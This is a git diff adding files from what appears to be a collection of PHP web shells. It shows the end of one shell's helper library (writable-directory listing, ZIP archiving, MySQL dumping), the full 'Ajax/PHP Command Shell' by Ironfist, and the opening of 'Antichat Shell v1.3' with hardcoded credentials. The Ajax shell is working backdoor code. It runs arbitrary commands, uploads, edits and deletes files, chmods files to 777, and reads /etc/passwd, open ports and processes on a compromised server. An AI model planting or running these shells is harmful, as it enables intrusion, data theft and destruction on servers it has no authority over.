+	$result = get_cfg_var($varname);
+	if ($result == 0) {
+		return 'No';
+	} elseif ($result == 1) {
+		return 'Yes';
+	} else {
+		return $result;
+	}
+}
+
+// ¼ì²éº¯ÊýÇé¿ö
+function getfun($funName) {
+	return (false !== function_exists($funName)) ? 'Yes' : 'No';
+}
+
+function GetList($dir){
+	global $dirdata,$j,$nowpath;
+	!$j && $j=1;
+	if ($dh = opendir($dir)) {
+		while ($file = readdir($dh)) {
+			$f=str_replace('//','/',$dir.'/'.$file);
+			if($file!='.' && $file!='..' && is_dir($f)){
+				if (is_writable($f)) {
+					$dirdata[$j]['filename']=str_replace($nowpath,'',$f);
+					$dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
+					$dirdata[$j]['dirchmod']=getChmod($f);
+					$dirdata[$j]['dirperm']=getPerms($f);
+					$dirdata[$j]['dirlink']=ue($dir);
+					$dirdata[$j]['server_link']=$f;
+					$dirdata[$j]['client_link']=ue($f);
+					$j++;
+				}
+				GetList($f);
+			}
+		}
+		closedir($dh);
+		clearstatcache();
+		return $dirdata;
+	} else {
+		return array();
+	}
+}
+
+function qy($sql) { 
+	//echo $sql.'<br>';
+	$res = $error = '';
+	if(!$res = @mysql_query($sql)) { 
+		return 0;
+	} else if(is_resource($res)) {
+		return 1; 
+	} else {
+		return 2;
+	}	
+	return 0;
+}
+
+function q($sql) { 
+	return @mysql_query($sql);
+}
+
+function fr($qy){
+	mysql_free_result($qy);
+}
+
+function sizecount($size) {
+	if($size > 1073741824) {
+		$size = round($size / 1073741824 * 100) / 100 . ' G';
+	} elseif($size > 1048576) {
+		$size = round($size / 1048576 * 100) / 100 . ' M';
+	} elseif($size > 1024) {
+		$size = round($size / 1024 * 100) / 100 . ' K';
+	} else {
+		$size = $size . ' B';
+	}
+	return $size;
+}
+
+// ѹËõ´ò°üÀà
+class PHPZip{
+	var $out='';
+	function PHPZip($dir)	{
+		if (@function_exists('gzcompress'))	{
+			$curdir = getcwd();
+			if (is_array($dir)) $filelist = $dir;
+			else{
+				$filelist=$this -> GetFileList($dir);//ÎļþÁбí
+				foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
+			}
+			if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
+			else chdir($curdir);
+			if (count($filelist)>0){
+				foreach($filelist as $filename){
+					if (is_file($filename)){
+						$fd = fopen ($filename, 'r');
+						$content = @fread ($fd, filesize($filename));
+						fclose ($fd);
+						if (is_array($dir)) $filename = basename($filename);
+						$this -> addFile($content, $filename);
+					}
+				}
+				$this->out = $this -> file();
+				chdir($curdir);
+			}
+			return 1;
+		}
+		else return 0;
+	}
+
+	// »ñµÃÖ¸¶¨Ä¿Â¼ÎļþÁбí
+	function GetFileList($dir){
+		static $a;
+		if (is_dir($dir)) {
+			if ($dh = opendir($dir)) {
+				while ($file = readdir($dh)) {
+					if($file!='.' && $file!='..'){
+						$f=$dir .'/'. $file;
+						if(is_dir($f)) $this->GetFileList($f);
+						$a[]=$f;
+					}
+				}
+				closedir($dh);
+			}
+		}
+		return $a;
+	}
+
+	var $datasec      = array();
+	var $ctrl_dir     = array();
+	var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+	var $old_offset   = 0;
+
+	function unix2DosTime($unixtime = 0) {
+		$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+		if ($timearray['year'] < 1980) {
+			$timearray['year']    = 1980;
+			$timearray['mon']     = 1;
+			$timearray['mday']    = 1;
+			$timearray['hours']   = 0;
+			$timearray['minutes'] = 0;
+			$timearray['seconds'] = 0;
+		} // end if
+		return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+				($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+	}
+
+	function addFile($data, $name, $time = 0) {
+		$name = str_replace('\\', '/', $name);
+
+		$dtime = dechex($this->unix2DosTime($time));
+		$hexdtime	= '\x' . $dtime[6] . $dtime[7]
+					. '\x' . $dtime[4] . $dtime[5]
+					. '\x' . $dtime[2] . $dtime[3]
+					. '\x' . $dtime[0] . $dtime[1];
+		eval('$hexdtime = "' . $hexdtime . '";');
+		$fr	= "\x50\x4b\x03\x04";
+		$fr	.= "\x14\x00";
+		$fr	.= "\x00\x00";
+		$fr	.= "\x08\x00";
+		$fr	.= $hexdtime;
+
+		$unc_len = strlen($data);
+		$crc = crc32($data);
+		$zdata = gzcompress($data);
+		$c_len = strlen($zdata);
+		$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+		$fr .= pack('V', $crc);
+		$fr .= pack('V', $c_len);
+		$fr .= pack('V', $unc_len);
+		$fr .= pack('v', strlen($name));
+		$fr .= pack('v', 0);
+		$fr .= $name;
+		$fr .= $zdata;
+		$fr .= pack('V', $crc);
+		$fr .= pack('V', $c_len);
+		$fr .= pack('V', $unc_len);
+
+		$this -> datasec[] = $fr;
+		$new_offset = strlen(implode('', $this->datasec));
+
+		$cdrec = "\x50\x4b\x01\x02";
+		$cdrec .= "\x00\x00";
+		$cdrec .= "\x14\x00";
+		$cdrec .= "\x00\x00";
+		$cdrec .= "\x08\x00";
+		$cdrec .= $hexdtime;
+		$cdrec .= pack('V', $crc);
+		$cdrec .= pack('V', $c_len);
+		$cdrec .= pack('V', $unc_len);
+		$cdrec .= pack('v', strlen($name) );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('v', 0 );
+		$cdrec .= pack('V', 32 );
+		$cdrec .= pack('V', $this -> old_offset );
+		$this -> old_offset = $new_offset;
+		$cdrec .= $name;
+
+		$this -> ctrl_dir[] = $cdrec;
+	}
+
+	function file() {
+		$data    = implode('', $this -> datasec);
+		$ctrldir = implode('', $this -> ctrl_dir);
+		return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) .	pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
+	}
+}
+
+// ±¸·ÝÊý¾Ý¿â
+function sqldumptable($table, $fp=0) {
+	$tabledump = "DROP TABLE IF EXISTS $table;\n";
+	$tabledump .= "CREATE TABLE $table (\n";
+
+	$firstfield=1;
+
+	$fields = q("SHOW FIELDS FROM $table");
+	while ($field = mysql_fetch_array($fields)) {
+		if (!$firstfield) {
+			$tabledump .= ",\n";
+		} else {
+			$firstfield=0;
+		}
+		$tabledump .= "   $field[Field] $field[Type]";
+		if (!empty($field["Default"])) {
+			$tabledump .= " DEFAULT '$field[Default]'";
+		}
+		if ($field['Null'] != "YES") {
+			$tabledump .= " NOT NULL";
+		}
+		if ($field['Extra'] != "") {
+			$tabledump .= " $field[Extra]";
+		}
+	}
+	fr($fields);
+
+	$keys = q("SHOW KEYS FROM $table");
+	while ($key = mysql_fetch_array($keys)) {
+		$kname=$key['Key_name'];
+		if ($kname != "PRIMARY" && $key['Non_unique'] == 0) {
+			$kname="UNIQUE|$kname";
+		}
+		if(!is_array($index[$kname])) {
+			$index[$kname] = array();
+		}
+		$index[$kname][] = $key['Column_name'];
+	}
+	fr($keys);
+
+	while(list($kname, $columns) = @each($index)) {
+		$tabledump .= ",\n";
+		$colnames=implode($columns,",");
+
+		if ($kname == "PRIMARY") {
+			$tabledump .= "   PRIMARY KEY ($colnames)";
+		} else {
+			if (substr($kname,0,6) == "UNIQUE") {
+				$kname=substr($kname,7);
+			}
+			$tabledump .= "   KEY $kname ($colnames)";
+		}
+	}
+
+	$tabledump .= "\n);\n\n";
+	if ($fp) {
+		fwrite($fp,$tabledump);
+	} else {
+		echo $tabledump;
+	}
+
+	$rows = q("SELECT * FROM $table");
+	$numfields = mysql_num_fields($rows);
+	while ($row = mysql_fetch_array($rows)) {
+		$tabledump = "INSERT INTO $table VALUES(";
+
+		$fieldcounter=-1;
+		$firstfield=1;
+		while (++$fieldcounter<$numfields) {
+			if (!$firstfield) {
+				$tabledump.=", ";
+			} else {
+				$firstfield=0;
+			}
+
+			if (!isset($row[$fieldcounter])) {
+				$tabledump .= "NULL";
+			} else {
+				$tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
+			}
+		}
+
+		$tabledump .= ");\n";
+
+		if ($fp) {
+			fwrite($fp,$tabledump);
+		} else {
+			echo $tabledump;
+		}
+	}
+	fr($rows);
+	if ($fp) {
+		fwrite($fp,"\n");
+	} else {
+		echo "\n";
+	}
+}
+
+function ue($str){
+	return urlencode($str);
+}
+
+function p($str){
+	echo $str."\n";
+}
+
+function tbhead() {
+	p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
+}
+function tbfoot(){
+	p('</table>');
+}
+
+function makehide($name,$value=''){
+	p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
+}
+
+function makeinput($arg = array()){
+	$arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
+	$arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
+	!$arg['type'] && $arg['type'] = 'text';
+	$arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
+	$arg['class'] = $arg['class'] ? $arg['class'] : 'input';
+	if ($arg['newline']) {
+		p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
+	} else {
+		p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
+	}
+}
+
+function makeselect($arg = array()){
+	if ($arg['onchange']) {
+		$onchange = 'onchange="'.$arg['onchange'].'"';
+	}
+	$arg['title'] = $arg['title'] ? $arg['title'] : '';
+	if ($arg['newline']) p('<p>');
+	p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
+		if (is_array($arg['option'])) {
+			foreach ($arg['option'] as $key=>$value) {
+				if ($arg['selected']==$key) {
+					p("<option value=\"$key\" selected>$value</option>");
+				} else {
+					p("<option value=\"$key\">$value</option>");
+				}
+			}
+		}
+	p("</select>");
+	if ($arg['newline']) p('</p>');
+}
+function formhead($arg = array()) {
+	!$arg['method'] && $arg['method'] = 'post';
+	!$arg['action'] && $arg['action'] = $self;
+	$arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
+	!$arg['name'] && $arg['name'] = 'form1';
+	p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
+	if ($arg['title']) {
+		p('<h2>'.$arg['title'].' &raquo;</h2>');
+	}
+}
+	
+function maketext($arg = array()){
+	!$arg['cols'] && $arg['cols'] = 100;
+	!$arg['rows'] && $arg['rows'] = 25;
+	$arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
+	p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
+}
+
+function formfooter($name = ''){
+	!$name && $name = 'submit';
+	p('<p><input class="bt" name="'.$name.'" id=\"'.$name.'\" type="submit" value="Submit"></p>');
+	p('</form>');
+}
+
+function formfoot(){
+	p('</form>');
+}
+
+// µ÷ÊÔº¯Êý
+function pr($a) {
+	echo '<pre>';
+	print_r($a);
+	echo '</pre>';
+}
+
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/Ajax_PHP Command Shell.php.txt b/xakep-shells/PHP/Ajax_PHP Command Shell.php.txt
new file mode 100644
index 0000000..d08768a
--- /dev/null
+++ b/xakep-shells/PHP/Ajax_PHP Command Shell.php.txt	
@@ -0,0 +1,646 @@
+<?php
+session_start();
+
+error_reporting(0);
+
+$password = "password";		 //Change this to your password ;)
+
+$version = "0.7B";
+
+$functions = array('Clear Screen' => 'ClearScreen()',
+'Clear History' => 'ClearHistory()',
+'Can I function?' => "runcommand('canirun','GET')",
+'Get server info' => "runcommand('showinfo','GET')",
+'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')",
+'Open ports' => "runcommand('netstat -an | grep -i listen','GET')",
+'Running processes' => "runcommand('ps -aux','GET')",
+'Readme' => "runcommand('shellhelp','GET')"
+
+);
+$thisfile = basename(__FILE__);
+
+$style = '<style type="text/css">
+.cmdthing {
+    border-top-width: 0px;
+    font-weight: bold;
+    border-left-width: 0px;
+    font-size: 10px;
+    border-left-color: #000000;
+    background: #000000;
+    border-bottom-width: 0px;
+    border-bottom-color: #FFFFFF;
+    color: #FFFFFF;
+    border-top-color: #008000;
+    font-family: verdana;
+    border-right-width: 0px;
+    border-right-color: #000000;
+}
+input,textarea {
+    border-top-width: 1px;
+    font-weight: bold;
+    border-left-width: 1px;
+    font-size: 10px;
+    border-left-color: #FFFFFF;
+    background: #000000;
+    border-bottom-width: 1px;
+    border-bottom-color: #FFFFFF;
+    color: #FFFFFF;
+    border-top-color: #FFFFFF;
+    font-family: verdana;
+    border-right-width: 1px;
+    border-right-color: #FFFFFF;
+}
+A:hover {
+text-decoration: none;
+}
+
+
+table,td,div {
+border-collapse: collapse;
+border: 1px solid #FFFFFF;
+}
+body {
+color: #FFFFFF;
+font-family: verdana;
+}
+</style>';
+$sess = __FILE__.$password;
+if(isset($_POST['p4ssw0rD']))
+{
+	if($_POST['p4ssw0rD'] == $password)
+	{
+		$_SESSION[$sess] = $_POST['p4ssw0rD'];
+	}
+	else
+	{
+		die("Wrong password");
+	}
+
+}
+if($_SESSION[$sess] == $password)
+{
+	if(isset($_SESSION['workdir']))
+	{
+			if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir']))
+		{
+			chdir($_SESSION['workdir']);
+		}
+	}
+
+	if(isset($_FILES['uploadedfile']['name']))
+	{
+		$target_path = "./";
+		$target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 
+		if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
+			
+		}
+	}
+
+	if(isset($_GET['runcmd']))
+	{
+
+		$cmd = $_GET['runcmd'];
+
+		print "<b>".get_current_user()."~# </b>". htmlspecialchars($cmd)."<br>";
+
+		if($cmd == "")
+		{
+			print "Empty Command..type \"shellhelp\" for some ehh...help";
+		}
+
+		elseif($cmd == "upload")
+		{
+			print '<br>Uploading to: '.realpath(".");
+			if(is_writable(realpath(".")))
+			{
+				print "<br><b>I can write to this directory</b>";
+			}
+			else
+			{
+				print "<br><b><font color=red>I can't write to this directory, please choose another one.</b></font>";
+			}
+
+		}
+		elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file)))
+		{
+				if(file_exists($file[1]) && is_dir($file[1]))
+				{
+					chdir($file[1]);
+					$_SESSION['workdir'] = $file[1];
+					print "Current directory changed to ".$file[1];
+				}
+			else
+			{
+				print "Directory not found";
+			}
+		}
+
+		elseif(strtolower($cmd) == "shellhelp")
+		{
+print '<b><font size=7>Ajax/PHP Command Shell</b></font>
+&copy; By Ironfist
+
+The shell can be used by anyone to command any server, the main purpose was
+to create a shell that feels as dynamic as possible, is expandable and easy
+to understand.
+
+If one of the command execution functions work, the shell will function fine. 
+Try the "canirun" command to check this.
+
+Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re 
+not used to these commands, google a little. 
+
+<b>Custom Functions</b>
+If you want to add your own custom command in the Quick Commands list, check 
+out the code. The $function array contains \'func name\' => \'javascript function\'.
+Take a look at the built-in functions for examples.
+
+I know this readme isn\'t providing too much information, but hell, does this shell
+even require one :P
+
+- Iron
+			';
+
+		}
+		elseif(ereg("editfile (.*)",$cmd,$file))
+		{
+			if(file_exists($file[1]) && !is_dir($file[1]))
+			{
+				print "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\">";
+				$contents = file($file[1]);
+					foreach($contents as $line)
+					{
+						print htmlspecialchars($line);
+					}
+				print "</textarea><br><input size=80 type=text name=filetosave value=".$file[1]."><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
+			}
+			else
+			{
+			print "File not found.";
+			}
+		}
+		elseif(ereg("deletefile (.*)",$cmd,$file))
+		{
+			if(is_dir($file[1]))
+			{
+				if(rmdir($file[1]))
+				{
+					print "Directory succesfully deleted.";
+				}
+				else
+				{
+					print "Couldn't delete directory!";
+				}
+			}
+			else
+			{
+				if(unlink($file[1]))
+				{
+					print "File succesfully deleted.";
+				}
+				else
+				{
+					print "Couldn't delete file!";
+				}
+			}
+		}
+		elseif(strtolower($cmd) == "canirun")
+		{
+		print "If any of these functions is Enabled, the shell will function like it should.<br>";
+			if(function_exists(passthru))
+			{
+				print "Passthru: <b><font color=green>Enabled</b></font><br>";
+			}
+			else
+			{
+				print "Passthru: <b><font color=red>Disabled</b></font><br>";
+			}
+
+			if(function_exists(exec))
+			{
+				print "Exec: <b><font color=green>Enabled</b></font><br>";
+			}
+			else
+			{
+				print "Exec: <b><font color=red>Disabled</b></font><br>";
+			}
+
+			if(function_exists(system))
+			{
+				print "System: <b><font color=green>Enabled</b></font><br>";
+			}
+			else
+			{
+				print "System: <b><font color=red>Disabled</b></font><br>";
+			}
+			if(function_exists(shell_exec))
+			{
+				print "Shell_exec: <b><font color=green>Enabled</b></font><br>";
+			}
+			else
+			{
+				print "Shell_exec: <b><font color=red>Disabled</b></font><br>";
+			}
+		print "<br>Safe mode will prevent some stuff, maybe command execution, if you're looking for a <br>reason why the commands aren't executed, this is probally it.<br>";
+		if( ini_get('safe_mode') ){
+			print "Safe Mode: <b><font color=red>Enabled</b></font>";
+		}
+			else
+		{
+			print "Safe Mode: <b><font color=green>Disabled</b></font>";
+		}
+		print "<br><br>Open_basedir will block access to some files you <i>shouldn't</i> access.<br>";
+			if( ini_get('open_basedir') ){
+				print "Open_basedir: <b><font color=red>Enabled</b></font>";
+			}
+			else
+			{
+				print "Open_basedir: <b><font color=green>Disabled</b></font>";
+			}
+		}
+		//About the shell
+		elseif(ereg("listdir (.*)",$cmd,$directory))
+		{
+
+			if(!file_exists($directory[1]))
+			{
+				die("Directory not found");
+			}
+			//Some variables
+			chdir($directory[1]);
+			$i = 0; $f = 0;
+			$dirs = "";
+			$filez = "";
+			
+				if(!ereg("/$",$directory[1])) //Does it end with a slash?
+				{
+					$directory[1] .= "/"; //If not, add one
+				}
+			print "Listing directory: ".$directory[1]."<br>";
+			print "<table border=0><td><b>Directories</b></td><td><b>Files</b></td><tr>";
+			
+			if ($handle = opendir($directory[1])) {
+			   while (false !== ($file = readdir($handle))) {
+				   if(is_dir($file))
+				   {
+					   $dirs[$i]  = $file;
+					   $i++;
+				   }
+				   else
+				   {
+					   $filez[$f] = $file;
+					   $f++;
+				   }
+				   
+			   }
+			   print "<td>";
+			   
+			   foreach($dirs as $directory)
+			   {
+					print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($directory)."');\">[D]</i><i style=\"cursor:crosshair\" onclick=\"runcommand('changeworkdir ".realpath($directory)."','GET');\">[W]</i><b style=\"cursor:crosshair\" onclick=\"runcommand('clear','GET'); runcommand ('listdir ".realpath($directory)."','GET'); \">".$directory."</b><br>";
+			   }
+			   
+			   print "</td><td>";
+			   
+			   foreach($filez as $file)
+			   {
+				print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($file)."');\">[D]</i><u style=\"cursor:crosshair\" onclick=\"runcommand('editfile ".realpath($file)."','GET');\">".$file."</u><br>";
+			   }
+			   
+			   print "</td></table>";
+			}
+		}
+		elseif(strtolower($cmd) == "about")
+		{
+			print "Ajax Command Shell by <a href=http://www.ironwarez.info>Ironfist</a>.<br>Version $version";
+		}
+		//Show info
+		elseif(strtolower($cmd) == "showinfo")
+		{
+			if(function_exists(disk_free_space))
+			{
+				$free = disk_free_space("/") / 1000000;
+			}
+			else
+			{
+				$free = "N/A";
+			}
+			if(function_exists(disk_total_space))
+			{
+				$total = trim(disk_total_space("/") / 1000000);
+			}
+			else
+			{
+				$total = "N/A";
+			}
+			$path = realpath (".");
+			
+			print "<b>Free:</b> $free / $total MB<br><b>Current path:</b> $path<br><b>Uname -a Output:</b><br>";
+			
+			if(function_exists(passthru))
+			{
+				passthru("uname -a");
+			}
+			else
+			{
+				print "Passthru is disabled :(";
+			}
+		}
+		//Read /etc/passwd
+		elseif(strtolower($cmd) == "etcpasswdfile")
+		{
+
+			$pw = file('/etc/passwd/');
+			foreach($pw as $line)
+			{
+				print $line;
+			}
+
+
+		}
+		//Execute any other command
+		else
+		{
+
+			if(function_exists(passthru))
+			{
+				passthru($cmd);
+			}
+			else
+			{
+				if(function_exists(exec))
+				{
+					exec("ls -la",$result);
+					foreach($result as $output)
+					{
+						print $output."<br>";
+					}
+				}
+				else
+				{
+				if(function_exists(system))
+				{
+					system($cmd);
+				}
+				else
+				{
+					if(function_exists(shell_exec))
+					{
+						print shell_exec($cmd);
+					}
+						else
+						{
+						print "Sorry, none of the command functions works.";
+						}
+					}
+				}
+			}
+		}
+	}
+
+	elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent']))
+	{
+		$file = $_POST['filetosave'];
+		if(!is_writable($file))
+		{
+			if(!chmod($file, 0777))
+			{
+				die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^
+			}
+		}
+		
+		$fh = fopen($file, 'w');
+		$dt = $_POST['filecontent'];
+		fwrite($fh, $dt);
+		fclose($fh);
+	}
+	else
+	{
+?>
+<html>
+<title>Command Shell ~ <?php print getenv("HTTP_HOST"); ?></title>
+<head>
+<?php print $style; ?>
+<SCRIPT TYPE="text/javascript">
+function sf(){document.cmdform.command.focus();}
+var outputcmd = "";
+var cmdhistory = "";
+function ClearScreen()
+{
+	outputcmd = "";
+	document.getElementById('output').innerHTML = outputcmd;
+}
+
+function ClearHistory()
+{
+	cmdhistory = "";
+	document.getElementById('history').innerHTML = cmdhistory;
+}
+
+function deletefile(file)
+{
+	deleteit = window.confirm("Are you sure you want to delete\n"+file+"?");
+	if(deleteit)
+	{
+		runcommand('deletefile ' + file,'GET');
+	}
+}
+
+var http_request = false;
+function makePOSTRequest(url, parameters) {
+  http_request = false;
+  if (window.XMLHttpRequest) {
+	 http_request = new XMLHttpRequest();
+	 if (http_request.overrideMimeType) {
+		http_request.overrideMimeType('text/html');
+	 }
+  } else if (window.ActiveXObject) {
+	 try {
+		http_request = new ActiveXObject("Msxml2.XMLHTTP");
+	 } catch (e) {
+		try {
+		   http_request = new ActiveXObject("Microsoft.XMLHTTP");
+		} catch (e) {}
+	 }
+  }
+  if (!http_request) {
+	 alert('Cannot create XMLHTTP instance');
+	 return false;
+  }
+  
+
+  http_request.open('POST', url, true);
+  http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
+  http_request.setRequestHeader("Content-length", parameters.length);
+  http_request.setRequestHeader("Connection", "close");
+  http_request.send(parameters);
+}
+
+
+function SaveFile()
+{
+var poststr = "filetosave=" + encodeURI( document.saveform.filetosave.value ) +
+                    "&filecontent=" + encodeURI( document.getElementById("area1").value );
+makePOSTRequest('<?php print $ThisFile; ?>?savefile', poststr);
+document.getElementById('output').innerHTML = document.getElementById('output').innerHTML + "<br><b>Saved! If it didn't save, you'll need to chmod the file to 777 yourself,<br> however the script tried to chmod it automaticly.";
+}
+
+function runcommand(urltoopen,action,contenttosend){
+cmdhistory = "<br>&nbsp;<i style=\"cursor:crosshair\" onclick=\"document.cmdform.command.value='" + urltoopen + "'\">" + urltoopen + "</i> " + cmdhistory;
+document.getElementById('history').innerHTML = cmdhistory;
+if(urltoopen == "clear")
+{
+ClearScreen();
+}
+    var ajaxRequest;
+    try{
+        ajaxRequest = new XMLHttpRequest();
+    } catch (e){
+        try{
+            ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP");
+        } catch (e) {
+            try{
+                ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP");
+            } catch (e){
+                alert("Wicked error, nothing we can do about it...");
+                return false;
+            }
+        }
+    }
+    ajaxRequest.onreadystatechange = function(){
+        if(ajaxRequest.readyState == 4){
+        outputcmd = "<pre>"  + outputcmd + ajaxRequest.responseText +"</pre>";
+            document.getElementById('output').innerHTML = outputcmd;
+            var objDiv = document.getElementById("output");
+			objDiv.scrollTop = objDiv.scrollHeight;
+        }
+    }
+    ajaxRequest.open(action, "?runcmd="+urltoopen , true);
+	if(action == "GET")
+	{
+    ajaxRequest.send(null);
+	}
+    document.cmdform.command.value='';
+    return false;
+}
+
+function set_tab_html(newhtml)
+{
+document.getElementById('commandtab').innerHTML = newhtml;
+}
+
+function set_tab(newtab)
+{
+	if(newtab == "cmd")
+	{
+		newhtml = '&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,\'GET\');"><b>Command</b>: <input type=text name=command class=cmdthing size=100%><br></form>';
+	}
+	else if(newtab == "upload")
+	{
+		runcommand('upload','GET');
+		newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enctype="multipart/form-data" action="<?php print $ThisFile; ?>" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="10000000" />Choose a file to upload: <input name="uploadedfile" type="file" /><br /><input type="submit" value="Upload File" /></form></font>';
+	}
+	else if(newtab == "workingdir")
+	{
+		<?php
+		$folders = "<form name=workdir onsubmit=\"return runcommand(\'changeworkdir \' + document.workdir.changeworkdir.value,\'GET\');\"><input size=80% type=text name=changeworkdir value=\"";
+		$pathparts = explode("/",realpath ("."));
+		foreach($pathparts as $folder)
+		{
+		$folders .= $folder."/";
+		}
+		$folders .= "\"><input type=submit value=Change></form><br>Script directory: <i style=\"cursor:crosshair\"  onclick=\"document.workdir.changeworkdir.value=\'".dirname(__FILE__)."\'>".dirname(__FILE__)."</i>";
+
+		?>
+		newhtml = '<?php print $folders; ?>';
+	}
+	else if(newtab == "filebrowser")
+	{
+		newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>You can use it to change your working directory easily, don\'t expect too much of it.<br>Click on a file to edit it.<br><i>[W]</i> = set directory as working directory.<br><i>[D]</i> = delete file/directory';
+		runcommand('listdir .','GET');
+	}
+	else if(newtab == "createfile")
+	{
+		newhtml = '<b>File Editor, under construction.</b>';
+		document.getElementById('output').innerHTML = "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\"></textarea><br><input size=80 type=text name=filetosave value=\"<?php print realpath('.')."/".rand(1000,999999).".txt"; ?>\"><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
+		
+	}
+		document.getElementById('commandtab').innerHTML = newhtml;
+}
+</script>
+</head>
+<body bgcolor=black onload="sf();" vlink=white alink=white link=white>
+<table border=1 width=100% height=100%>
+<td width=15% valign=top>
+
+<form name="extras"><br>
+<center><b>Quick Commands</b><br>
+
+<div style='margin: 0px;padding: 0px;border: 1px inset;overflow: auto'>
+<?php
+foreach($functions as $name => $execute)
+{
+print '&nbsp;<input type="button" value="'.$name.'" onclick="'.$execute.'"><br>';
+}
+?>
+
+</center>
+
+</div>
+</form>
+<center><b>Command history</b><br></center>
+<div id="history" style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;height: 20%;text-align: left;overflow: auto;font-size: 10px;'></div>
+<br>
+<center><b>About</b><br></center>
+<div style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;text-align: center;overflow: auto; font-size: 10px;'>
+<br>
+<b><font size=3>Ajax/PHP Command Shell</b></font><br>by Ironfist
+<br>
+Version <?php print $version; ?>
+
+<br>
+<br>
+
+<br>Thanks to everyone @ 
+<a href="http://www.ironwarez.info" target=_blank>SharePlaza</a>
+<br>
+<a href="http://www.milw0rm.com" target=_blank>milw0rm</a>
+<br>
+and special greetings to everyone in rootshell
+</div>
+
+</td>
+<td width=70%>
+<table border=0 width=100% height=100%><td id="tabs" height=1%><font size=0>
+<b style="cursor:crosshair" onclick="set_tab('cmd');">[Execute command]</b> 
+<b style="cursor:crosshair" onclick="set_tab('upload');">[Upload file]</b> 
+<b style="cursor:crosshair" onclick="set_tab('workingdir');">[Change directory]</b> 
+<b style="cursor:crosshair" onclick="set_tab('filebrowser');">[Filebrowser]</b> 
+<b style="cursor:crosshair" onclick="set_tab('createfile');">[Create File]</b> 
+
+</font></td>
+<tr>
+<td height=99% width=100% valign=top><div id="output" style='height:100%;white-space:pre;overflow:auto'></div>
+
+<tr>
+<td  height=1% width=100% valign=top>
+<div id="commandtab" style='height:100%;white-space:pre;overflow:auto'>
+&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,'GET');">
+<b>Command</b>: <input type=text name=command class=cmdthing size=100%><br>
+</form>
+</div>
+</td>
+</table>
+</td>
+</table>
+</body>
+</html>
+<?php
+}
+} else {
+print "<center><table border=0  height=100%>
+<td valign=middle>
+<form action=".basename(__FILE__)." method=POST>You are not logged in, please login.<br><b>Password:</b><input type=password name=p4ssw0rD><input type=submit value=\"Log in\">
+</form>";
+}
+?>  
\ No newline at end of file
diff --git a/xakep-shells/PHP/Antichat Shell v1.3.php.txt b/xakep-shells/PHP/Antichat Shell v1.3.php.txt
new file mode 100644
index 0000000..72ea5cb
--- /dev/null
+++ b/xakep-shells/PHP/Antichat Shell v1.3.php.txt	
@@ -0,0 +1,180 @@
+<?php
+
+session_start();
+set_time_limit(9999999);
+$login='virangar';
+$password='r00t';
+$auth=1;
+$version='version 1.3 by Grinay';
